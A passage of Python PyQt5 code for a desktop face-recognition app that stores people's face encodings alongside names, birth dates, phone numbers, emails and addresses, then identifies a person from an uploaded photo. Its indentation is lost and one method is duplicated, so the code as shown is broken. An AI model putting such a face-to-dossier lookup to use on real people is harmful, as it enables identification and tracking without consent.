self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent}")
self.popup_icon_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_icon_err_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_err,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_err.setGraphicsEffect(self.popup_icon_err_shadow)
self.frame_err = QtWidgets.QFrame(self.tab_2)
self.frame_err.setObjectName(u"frame_err")
self.frame_err.setStyleSheet(u"#frame_err{background:transparent}")
self.frame_err.setGeometry(QtCore.QRect(1030, 500, 411, 51))
self.frame_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.shadow_frame_err = QtWidgets.QGraphicsDropShadowEffect(self.frame_err,blurRadius=30,xOffset=1,yOffset=1,color=QtGui.QColor(222, 18, 21))
self.frame_err.setGraphicsEffect(self.shadow_frame_err)
self.alert_err = QtWidgets.QFrame(self.tab_2)
self.alert_err.setObjectName(u"alert_err")
self.alert_err.setStyleSheet(u"#alert_err{background:transparent}")
self.alert_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.alert_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.label_err = QtWidgets.QLabel(self.frame_err)
self.label_err.setObjectName("label_err")
self.label_err.setStyleSheet("#label_err{background:transparent;color:rgba(255, 28, 51,0.9)}")
self.frame_22 = QtWidgets.QFrame(self.frame2)
self.frame_22.setObjectName(u"frame_22")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_22.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_22.setFrameShadow(QtWidgets.QFrame.Raised)
self.label2 = QtWidgets.QLabel(self.frame_22)
self.label2.setGeometry(QtCore.QRect(75, 80, 100, 50))
self.label2.setStyleSheet("#label2{background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:0, stop:0 rgba(0, 0, 0, 0), stop:1 rgba(23, 65, 66, 200));\n"
"font: 25pt \"Roboto Slab\";\n"
"color: rgb(0, 221, 255);}")
self.label2.setObjectName("label2")
self.shadow_label2 = QtWidgets.QGraphicsDropShadowEffect(self.label2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.label2.setGraphicsEffect(self.shadow_label2)
font = QtGui.QFont(fontstr)
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.upload = QtWidgets.QPushButton(self.tab_2)
self.upload.setEnabled(True)
self.upload.setGeometry(QtCore.QRect(270, 20, 355, 350))
self.upload.setObjectName("upload")
self.upload.setStyleSheet("#upload{background:transparent;border-image:url('./src/images/face1.png');}")
self.upload.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.upload.setMouseTracking(True)
self.shadow2 = QtWidgets.QGraphicsDropShadowEffect(self.upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.upload.setGraphicsEffect(self.shadow2)
self.upload.clicked.connect(self.img_select)
self.upload2 = QtWidgets.QPushButton(self.tab_2)
self.upload2.setEnabled(True)
self.upload2.setGeometry(QtCore.QRect(480, 496, 120, 50))
self.upload2.setText("Search")
self.upload2.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.upload2.setMouseTracking(True)
self.upload2.setFocusPolicy(QtCore.Qt.NoFocus)
self.upload2.setLayoutDirection(QtCore.Qt.LeftToRight)
self.upload2.setAutoFillBackground(False)
self.upload2.setFont(font)
self.upload2.setStyleSheet("#upload2:hover {background: rgba(0, 252, 150, 0.17);}#upload2{background: rgba(0, 252, 139, 0.1);padding:5px;color:rgb(0, 252, 160);border: 1px solid rgb(0, 252, 160);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(0, 252, 139);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.upload2,blurRadius=20,xOffset=1,yOffset=1)
self.upload2.setGraphicsEffect(self.shadow1)
self.upload2.clicked.connect(self.prc)
self.upload2.setInputMethodHints(QtCore.Qt.ImhNone)
self.upload2.setShortcut("")
self.upload2.setCheckable(False)
self.upload2.setObjectName("upload2")
self.remove = QtWidgets.QPushButton(self.tab_2)
self.remove.setEnabled(True)
self.remove.setGeometry(QtCore.QRect(325, 496, 120, 50))
self.remove.setText("Reload")
self.remove.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.remove.setMouseTracking(True)
self.remove.setFocusPolicy(QtCore.Qt.NoFocus)
self.remove.setLayoutDirection(QtCore.Qt.LeftToRight)
self.remove.setAutoFillBackground(False)
self.remove.setFont(font)
self.remove.setStyleSheet("#remove:hover {background: rgba(255, 106, 0, 0.17);}#remove{background: rgba(255, 106, 0, 0.1);padding:5px;color:rgb(255, 106, 0);border: 1px solid rgb(255, 106, 0);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(255, 106, 0);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.remove,blurRadius=20,xOffset=1,yOffset=1)
self.remove.setGraphicsEffect(self.shadow1)
self.remove.clicked.connect(self.reload)
self.remove.setInputMethodHints(QtCore.Qt.ImhNone)
self.remove.setShortcut("")
self.remove.setCheckable(False)
self.remove.setObjectName("remove")
self.pushButton = QtWidgets.QPushButton(self.tab)
self.pushButton.setEnabled(True)
self.pushButton.setGeometry(QtCore.QRect(590, 580, 90, 35))
self.pushButton.setText("Add")
self.pushButton.clicked.connect(self.add)
self.pushButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pushButton.setMouseTracking(True)
self.pushButton.setFocusPolicy(QtCore.Qt.NoFocus)
self.pushButton.setLayoutDirection(QtCore.Qt.LeftToRight)
self.pushButton.setAutoFillBackground(False)
self.pushButton.setFont(font)
self.pushButton.setStyleSheet("#pushButton:hover {background: rgba(0, 214, 252, 0.17);}#pushButton{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(20, 182, 216);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.pushButton,blurRadius=20,xOffset=1,yOffset=1)
self.pushButton.setGraphicsEffect(self.shadow1)
self.pushButton.setInputMethodHints(QtCore.Qt.ImhNone)
self.pushButton.setShortcut("")
self.pushButton.setCheckable(False)
self.pushButton.setObjectName("pushButton")
self.popup = QtWidgets.QFrame(self.tab_2)
self.popup.setObjectName("popup")
self.popup.setStyleSheet("#popup{background:transparent}")
self.popup.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_remove = QtWidgets.QPushButton(self.popup)
self.popup_remove.setObjectName("popup_remove")
self.popup_remove.setStyleSheet("#popup_remove{background:transparent}")
self.popup_icon_frame = QtWidgets.QFrame(self.popup)
self.popup_icon_frame.setObjectName("popup_icon_frame")
self.popup_icon_frame.setStyleSheet("#popup_icon_frame{background:transparent}")
self.popup_icon_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_text_frame = QtWidgets.QLabel(self.popup)
self.popup_text_frame.setObjectName("popup_text_frame")
self.popup_text_frame.setStyleSheet("#popup_text_frame{background:transparent}")
self.popup_error_input = QtWidgets.QFrame(self.tab)
self.popup_error_input.setObjectName("popup_error_input")
self.popup_error_input.setStyleSheet("#popup_error_input{background:transparent}")
self.popup_remove_input = QtWidgets.QPushButton(self.popup_error_input)
self.popup_remove_input.setObjectName("popup_remove_input")
self.popup_remove_input.setStyleSheet("#popup_remove_input{background:transparent}")
self.popup_icon_frame_input = QtWidgets.QFrame(self.popup_error_input)
self.popup_icon_frame_input.setObjectName("popup_icon_frame_input")
self.popup_icon_frame_input.setStyleSheet("#popup_icon_frame_input{background:transparent}")
self.popup_icon_frame_input.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_frame_input.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_text_frame_input = QtWidgets.QLabel(self.popup_error_input)
self.popup_text_frame_input.setObjectName("popup_text_frame_input")
self.popup_text_frame_input.setStyleSheet("#popup_text_frame_input{background:transparent}")
self.tabWidget.addTab(self.tab, "")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def img_select_2(self):
global path_2
path_2 = None
file_select = QtWidgets.QFileDialog()
filters = "Image files (*.jpg *.png *jpeg)"
path_2 = QtWidgets.QFileDialog.getOpenFileName(file_select,"Select an image","./",filters)
if path_2 != None and path_2[0] != "":
self.id_upload.setGeometry(QtCore.QRect(100, 120, 100, 100))
self.id_upload.setStyleSheet(str("#id_upload{border-image:url('")+path_2[0]+str("');border-radius:5px}"))
def add(self):
input_error = False
first_name = self.plainTextEdit_4.text()
last_name = self.plainTextEdit_2.text()
day = self.plainTextEdit_5.text()
month = self.plainTextEdit_9.text()
year = self.plainTextEdit_55.text()
country = self.plainTextEdit_3.text()
city = self.plainTextEdit_6.text()
gender = self.plainTextEdit.text()
job = self.plainTextEdit_10.text()
work_location = self.plainTextEdit_11.text()
num_1 = self.plainTextEdit_111.text()
num_2 = self.plainTextEdit_222.text()
email = self.plainTextEdit_333.text()
addr = self.plainTextEdit_444.text()
info_list = [first_name,last_name,day,month,year,country,city,gender,job,work_location,num_1,num_2,email,addr]
for info in info_list:
if str(info) != "" and path_2 != None and path_2[0] != "":
input_error = False
else:
input_error = True
if path_2 == None or first_name == "" or last_name == "":
self.popup_error_input_func()
else:
img = Image.open(path_2[0])
input1 = frc.load_image_file(path_2[0])
face = frc.face_locations(input1,model="hog")
enc = frc.face_encodings(input1,face)
jdict = {"name":str(first_name)+" "+str(last_name),"dob":str(day)+"."+str(month)+"."+str(year),
"cc":str(country)+"/"+str(city),"gen":gender,"job":job,"phone_n1":num_1,"phone_n2":num_2,"job_loc":work_location,"addr":addr,"email":email}
res = json.dumps(jdict)
name = str(first_name)+" "+str(last_name)
os.mkdir(f"./data/{name}")
np.save(f"./data/{name}/enc.npy",enc)
img.save(f"./data/{name}/{name}.jpg")
with open(f"./data/{name}/data.json","w") as f:
f.write(res)
f.close()
def popup_error_input_func(self):
self.popup_error_input.show()
blured_elements = [self.tab_11,self.plainTextEdit,self.plainTextEdit_2,self.plainTextEdit_3,self.plainTextEdit_4,self.plainTextEdit_5,
self.plainTextEdit_6,self.plainTextEdit_9,self.plainTextEdit_10,self.plainTextEdit_11,self.plainTextEdit_55,self.plainTextEdit_111,
self.plainTextEdit_222,self.plainTextEdit_333,self.plainTextEdit_444,self.pushButton,self.id_upload,self.gen,self.contact]
for elements in blured_elements:
elements.setEnabled(False)
self.blur_effect_input = QtWidgets.QGraphicsBlurEffect(elements)
self.blur_effect_input.setBlurRadius(7)
elements.setGraphicsEffect(self.blur_effect_input)
self.popup_error_input.setGeometry(QtCore.QRect(500,200,300,150))
self.popup_error_input.setStyleSheet("#popup_error_input{background-color:rgba(110, 0, 0,0.3);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.popup_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_error_input,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_error_input.setGraphicsEffect(self.popup_shadow)
self.popup_remove_input.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.popup_remove_input.setMouseTracking(True)
self.popup_remove_input.setFocusPolicy(QtCore.Qt.NoFocus)
self.popup_remove_input.setLayoutDirection(QtCore.Qt.LeftToRight)
self.popup_remove_input.setAutoFillBackground(False)
self.popup_remove_input.clicked.connect(self.popup_remove_func_input)
self.popup_remove_input.setInputMethodHints(QtCore.Qt.ImhNone)
self.popup_remove_input.setShortcut("")
self.popup_remove_input.setCheckable(False)
self.popup_icon_frame_input.setGeometry(QtCore.QRect(110,10,80,80))
self.popup_icon_frame_input.setStyleSheet("#popup_icon_frame_input{background:transparent;border-image:url('./src/images/image(4).png')}")
self.popup_icon_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_frame_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_frame_input.setGraphicsEffect(self.popup_icon_frame_shadow)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
font_popup = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
popup_font = QtGui.QFont(font_popup)
popup_font.setPointSize(10)
popup_font.setBold(False)
popup_font.setItalic(False)
popup_font.setWeight(30)
self.popup_text_frame_input.setGeometry(QtCore.QRect(40,80,300,50))
self.popup_text_frame_input.setStyleSheet("#popup_text_frame_input{background:transparent;color:rgb(255, 28, 51)}")
self.popup_text_frame_input.setText("Informations uncompleted")
self.popup_text_frame_input.setFont(popup_font)
self.popup_text_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_text_frame_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_text_frame.setGraphicsEffect(self.popup_text_frame_shadow)
self.popup_remove_input.setGeometry(QtCore.QRect(282,8,10,10))
self.popup_remove_input.setStyleSheet("#popup_remove_input{background:transparent;border-image:url('./src/images/image(6).png')}")
self.popup_remove_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_remove_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_remove_input.setGraphicsEffect(self.popup_remove_shadow)
def popup_remove_func_input(self):
self.popup_error_input.hide()
blured_elements = [self.tab_11,self.plainTextEdit,self.plainTextEdit_2,self.plainTextEdit_3,self.plainTextEdit_4,self.plainTextEdit_5,self.plainTextEdit_6,
self.plainTextEdit_9,self.plainTextEdit_10,self.plainTextEdit_11,self.plainTextEdit_55,self.plainTextEdit_111,
self.plainTextEdit_222,self.plainTextEdit_333,self.plainTextEdit_444,self.pushButton,self.id_upload,self.gen,self.contact]
for elements in blured_elements:
elements.setEnabled(True)
self.blur_effect_input.setEnabled(False)
elements.setGraphicsEffect(self.blur_effect_input)
self.pushButton.setEnabled(True)
def popup_remove_func(self):
self.popup.hide()
blured_elements = [self.upload2,self.frame,self.frame2,self.upload,self.remove,self.lab,self.lab2,self.label_err,self.tab_22]
for elements in blured_elements:
self.blur_effect.setEnabled(False)
elements.setGraphicsEffect(self.blur_effect)
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.upload2,blurRadius=20,xOffset=1,yOffset=1)
self.upload2.setGraphicsEffect(self.shadow1)
self.shadow1_ = QtWidgets.QGraphicsDropShadowEffect(self.remove,blurRadius=20,xOffset=1,yOffset=1)
self.remove.setGraphicsEffect(self.shadow1_)
self.shadow2 = QtWidgets.QGraphicsDropShadowEffect(self.upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.upload.setGraphicsEffect(self.shadow2)
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.upload2.setEnabled(True)
self.remove.setEnabled(True)
self.upload.setEnabled(True)
def load(self,value):
self.frame.setGeometry(QtCore.QRect(1030, 50, 231, 231))
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.label.setStyleSheet("#label{background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:0, stop:0 rgba(0, 0, 0, 0), stop:1 rgba(255, 255, 255, 255));\n"
"font: 25pt \"Roboto Slab\";\n"
"color: rgb(0, 255, 8);}")
self.label.setGeometry(QtCore.QRect(75, 80, 100, 50))
self.shadow_label = QtWidgets.QGraphicsDropShadowEffect(self.label,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 8))
self.label.setGraphicsEffect(self.shadow_label)
self.value = value
self.styleSheet = "#frame{background-color: qconicalgradient(cx:0.5, cy:0.5, angle:0, stop:{p1} rgb(0, 255, 98), stop:{p2} rgba(16, 145, 196, 20));border-radius:115;}"
self.prog = (self.value)/100
self.p1 = str(self.prog-0.0001)
self.p2 = str(self.prog)
self.newStylesheet = self.styleSheet.replace("{p1}", self.p1).replace("{p2}", self.p2)
self.label_noimg2.setText("")
self.label_noimg.setText("")
self.frame_2.setGeometry(QtCore.QRect(5, 6, 221, 221))
self.frame_2.setStyleSheet(u"#frame_2{border-radius:109px;background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0.994318, stop:1 rgba(23, 65, 66, 200));}")
self.frame.setStyleSheet(self.newStylesheet)
self.label.setText(f"{value} %")
def load_2(self,value1):
self.value1 = value1
self.styleSheet1 = "#frame2{background-color: qconicalgradient(cx:0.5, cy:0.5, angle:0, stop:{p11} rgb(0, 221, 255), stop:{p22} rgba(16, 145, 196, 20));border-radius:115;}"
self.prog1 = (self.value1)/100
self.p11 = str(self.prog1-0.0001)
self.p22 = str(self.prog1)
self.newStylesheet1 = self.styleSheet1.replace("{p11}", self.p11).replace("{p22}", self.p22)
self.frame2.setStyleSheet(self.newStylesheet1)
self.frame_22.setStyleSheet(u"#frame_22{border-radius:109px;background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0.994318, stop:1 rgba(23, 65, 66, 200));}")
self.frame_22.setGeometry(QtCore.QRect(5, 6, 221, 221))
self.label2.setText(f"{value1} %")
if self.value1 == 100:
time.sleep(1)
self.value1 = 0
def img_select(self):
global path
file_select = QtWidgets.QFileDialog()
filters = "Image files (*.jpg *.png *jpeg)"
path = None
path = QtWidgets.QFileDialog.getOpenFileName(file_select,"Select an image","./",filters)
if path != None and path[0] != "":
img = QtGui.QImage(path[0])
img_w = img.width()
img_h = img.height()
w = 230
if img_w > 550:
img_w = 700
w = 100
if img_h > 440:
img_h = 400
self.upload.setGeometry(QtCore.QRect(w, 50, img_w, img_h))
self.upload.setStyleSheet(str("#upload{border-image:url(")+path[0]+str(");}"))
else:
print("Please select an image")
def prc(self):
if path != None and path[0] != "":
self.sig = External()
self.sig.signal.connect(self.load)
self.sig1 = External()
self.sig1.signal_.connect(self.load_2)
self.sig.start()
if self.frame.visibleRegion().isEmpty() and self.frame_2.visibleRegion().isEmpty():
self.frame.show()
self.frame_2.show()
Thread(target = self.process).start()
else:
self.popup_error()
def popup_error(self):
self.popup.show()
blured_elements = [self.upload2,self.frame,self.frame2,self.upload,self.remove,self.lab,self.lab2,self.label_err,self.tab_22]
for elements in blured_elements:
self.blur_effect = QtWidgets.QGraphicsBlurEffect(elements)
self.blur_effect.setBlurRadius(7)
elements.setGraphicsEffect(self.blur_effect)
self.upload2.setEnabled(False)
self.remove.setEnabled(False)
self.upload.setEnabled(False)
self.popup.setGeometry(QtCore.QRect(500,200,300,150))
self.popup.setStyleSheet("#popup{background-color:rgba(110, 0, 0,0.3);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.popup_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup.setGraphicsEffect(self.popup_shadow)
self.popup_remove.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.popup_remove.setMouseTracking(True)
self.popup_remove.setFocusPolicy(QtCore.Qt.NoFocus)
self.popup_remove.setLayoutDirection(QtCore.Qt.LeftToRight)
self.popup_remove.setAutoFillBackground(False)
self.popup_remove.clicked.connect(self.popup_remove_func)
self.popup_remove.setInputMethodHints(QtCore.Qt.ImhNone)
self.popup_remove.setShortcut("")
self.popup_remove.setCheckable(False)
self.popup_icon_frame.setGeometry(QtCore.QRect(110,10,80,80))
self.popup_icon_frame.setStyleSheet("#popup_icon_frame{background:transparent;border-image:url('./src/images/image(4).png')}")
self.popup_icon_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_frame,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_frame.setGraphicsEffect(self.popup_icon_frame_shadow)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
font_popup = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
popup_font = QtGui.QFont(font_popup)
popup_font.setPointSize(10)
popup_font.setBold(False)
popup_font.setItalic(False)
popup_font.setWeight(30)
self.popup_text_frame.setGeometry(QtCore.QRect(47,80,300,50))
self.popup_text_frame.setStyleSheet("#popup_text_frame{background:transparent;color:rgb(255, 28, 51)}")
self.popup_text_frame.setText("Please select an image")
self.popup_text_frame.setFont(popup_font)
self.popup_text_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_text_frame,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_text_frame.setGraphicsEffect(self.popup_text_frame_shadow)
self.popup_remove.setGeometry(QtCore.QRect(282,8,10,10))
self.popup_remove.setStyleSheet("#popup_remove{background:transparent;border-image:url('./src/images/image(6).png')}")
self.popup_remove_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_remove,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_remove.setGraphicsEffect(self.popup_remove_shadow)
def popup_remove_func(self):
self.popup.hide()
blured_elements = [self.upload2,self.frame,self.frame2,self.upload,self.remove,self.lab,self.lab2,self.label_err,self.tab_22]
for elements in blured_elements:
self.blur_effect.setEnabled(False)
elements.setGraphicsEffect(self.blur_effect)
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.upload2,blurRadius=20,xOffset=1,yOffset=1)
self.upload2.setGraphicsEffect(self.shadow1)
self.shadow1_ = QtWidgets.QGraphicsDropShadowEffect(self.remove,blurRadius=20,xOffset=1,yOffset=1)
self.remove.setGraphicsEffect(self.shadow1_)
self.shadow2 = QtWidgets.QGraphicsDropShadowEffect(self.upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.upload.setGraphicsEffect(self.shadow2)
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.upload2.setEnabled(True)
self.remove.setEnabled(True)
self.upload.setEnabled(True)
def process(self):
self.sig1.start()
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font = QtGui.QFont(fontstr)
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
style = '''#upload{background-size:img_w img_h;background-image:url('./src/images/id.jpeg');}'''
self.label_err_face.setText("")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
process.load(path[0])
self.label_err.setText("")
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.start_error = process.start(path[0])
if self.frame2.visibleRegion().isEmpty() and self.frame_22.visibleRegion().isEmpty():
self.frame2.show()
self.frame_22.show()
if self.start_error == False:
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect()
self.shadow_lab_red.setEnabled(False)
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{border-image:url('./src/images/id2_.png');}")
process.search(path[0])
err_id = process.id_card()
time.sleep(0.5)
if err_id == False:
if not self.frame.visibleRegion().isEmpty() and not self.frame_22.visibleRegion().isEmpty() and not self.frame2.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame2.hide()
self.frame_22.hide()
self.frame.hide()
self.frame_2.hide()
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
self.label.setText("")
self.label2.setText("")
self.alert_err.setGeometry(QtCore.QRect(1070, 370, 150, 150))
self.label_err.setGeometry(QtCore.QRect(0,0,400,50))
self.label_err.setText("FACE DOESN'T EXIST")
self.label_noinfo.setText("")
self.lab2.setStyleSheet("#card2{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=1,yOffset=1,color=QtGui.QColor(222, 18, 21))
self.lab2.setGraphicsEffect(self.lab2_shadow)
self.alert_err.setStyleSheet("#alert_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err.setFont(font)
self.shadow_red = QtWidgets.QGraphicsDropShadowEffect(self.alert_err,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.alert_err.setGraphicsEffect(self.shadow_red)
else:
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.label_noinfo.setText("")
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.label.setText("")
self.label2.setText("")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.lab2.setStyleSheet("#card2{background:transparent;border-image:url('./src/images/id2.png');}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
elif self.start_error == None:
self.no_faces_error_func()
else:
self.many_faces_error_func()
def no_faces_error_func(self):
self.label_noinfo.setText("NO INFORMATIONS")
self.popup_icon_err.setGeometry(QtCore.QRect(170,30,150,150))
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err_face.setGeometry(QtCore.QRect(135,70,350,200))
self.label_err_face.setText("NO FACE DETECTED")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect(self.lab,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
def many_faces_error_func(self):
self.label_noinfo.setText("NO INFORMATIONS")
self.popup_icon_err.setGeometry(QtCore.QRect(170,30,150,150))
self.label_err_face.setGeometry(QtCore.QRect(70,70,380,200))
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;border-image:url('./src/images/image(4).png');}")
self.label_err_face.setText("TOO MANY FACES DETECTED")
if not self.frame.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame.hide()
self.frame2.hide()
self.frame_22.hide()
self.frame_2.hide()
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect(self.lab,blurRadius=30,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
